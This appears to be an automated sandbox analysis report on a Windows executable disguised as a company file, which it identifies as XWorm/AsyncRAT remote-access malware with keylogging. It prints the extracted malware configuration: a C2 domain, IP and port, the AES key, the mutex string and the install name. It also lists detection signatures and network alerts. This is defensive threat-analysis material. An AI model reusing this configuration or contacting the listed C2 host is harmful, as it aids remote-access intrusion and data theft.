Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.223.35.76	kanrplest.duckdns.org	United States		8100	ASN-QUADRANET-GLOBALUS	true

Contacted Domains

Name	IP	Active
kanrplest.duckdns.org	104.223.35.76	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kanrplest.duckdns.org	true		unknown

AV Detection

Found malware configuration

Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: SS Bottmac Engineers Pvt. Ltd..exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SS Bottmac Engineers Pvt. Ltd..exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: kanrplest.duckdns.org
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: 4068
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: <123456789>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: <Xwormmm>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
Source:	Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50014 -> 104.223.35.76:4068
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50035 -> 104.223.35.76:4068

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: kanrplest.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: kanrplest.duckdns.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49764 -> 104.223.35.76:4068

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: kanrplest.duckdns.org

Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: powershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017C4204	0_2_017C4204
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017CE134	0_2_017CE134
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_017C7018	0_2_017C7018
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07860E28	0_2_07860E28
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786A730	0_2_0786A730
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786C648	0_2_0786C648
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_078630D0	0_2_078630D0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863F88	0_2_07863F88
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AF93	0_2_0786AF93
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AFA0	0_2_0786AFA0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786CFF8	0_2_0786CFF8
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863F77	0_2_07863F77
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07860E21	0_2_07860E21
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863CEA	0_2_07863CEA
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07863CF0	0_2_07863CF0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786AB68	0_2_0786AB68
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_031846D0	9_2_031846D0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03184CC8	9_2_03184CC8
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_031813E0	9_2_031813E0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03181A49	9_2_03181A49
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_01244204	10_2_01244204
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0124E134	10_2_0124E134
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_01247018	10_2_01247018
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07777371	10_2_07777371
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07770E28	10_2_07770E28
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777A730	10_2_0777A730
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777C648	10_2_0777C648
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777C637	10_2_0777C637
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777A6FF	10_2_0777A6FF
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_077730D0	10_2_077730D0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773F77	10_2_07773F77
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777CFF8	10_2_0777CFF8
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777CFE9	10_2_0777CFE9
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AFA0	10_2_0777AFA0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AF91	10_2_0777AF91
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773F88	10_2_07773F88
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07770E27	10_2_07770E27
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773CF0	10_2_07773CF0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07773CEB	10_2_07773CEB
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AB68	10_2_0777AB68
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0777AB58	10_2_0777AB58
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_07777AB8	10_2_07777AB8
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0E962128	10_2_0E962128
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 10_2_0E963678	10_2_0E963678
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5B4A0	12_2_04E5B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5B490	12_2_04E5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_08E33A98	12_2_08E33A98
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 16_2_02AF13E0	16_2_02AF13E0
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Code function: 16_2_02AF1A49	16_2_02AF1A49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B490	17_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B470	17_2_04E7B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_08E63E98	17_2_08E63E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3B4A0	20_2_02B3B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3B490	20_2_02B3B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_07324408	20_2_07324408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08493A98	20_2_08493A98
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_01644204	22_2_01644204
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0164E134	22_2_0164E134
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_01647018	22_2_01647018
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07960E28	22_2_07960E28
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796A730	22_2_0796A730
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796C648	22_2_0796C648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_079630D0	22_2_079630D0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AF91	22_2_0796AF91
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963F88	22_2_07963F88
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AFA0	22_2_0796AFA0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796CFF8	22_2_0796CFF8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963F77	22_2_07963F77
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07960E21	22_2_07960E21
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963CF0	22_2_07963CF0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_07963CEA	22_2_07963CEA
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_0796AB68	22_2_0796AB68
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_093E20F8	22_2_093E20F8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 22_2_093E3648	22_2_093E3648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 26_2_00C413E0	26_2_00C413E0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 26_2_00C41A49	26_2_00C41A49
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_01774204	27_2_01774204
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0177E134	27_2_0177E134
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_01777018	27_2_01777018
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA0E28	27_2_07AA0E28
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAA730	27_2_07AAA730
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAC648	27_2_07AAC648
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA30D0	27_2_07AA30D0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAFA0	27_2_07AAAFA0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3F88	27_2_07AA3F88
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAF91	27_2_07AAAF91
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AACFF8	27_2_07AACFF8
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3F77	27_2_07AA3F77
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA0E21	27_2_07AA0E21
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3CEA	27_2_07AA3CEA
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AA3CF0	27_2_07AA3CF0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_07AAAB68	27_2_07AAAB68
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0EC82228	27_2_0EC82228
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 27_2_0EC83778	27_2_0EC83778
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 31_2_00F513E0	31_2_00F513E0
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 31_2_00F51A49	31_2_00F51A49

PE / OLE file has an invalid certificate

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2079413535.00000000059CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2071781432.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2092667055.000000000BA90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073615538.000000000498A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000000.2038933223.0000000000DFC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4544624751.0000000006569000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4540909750.0000000004341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2383977857.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
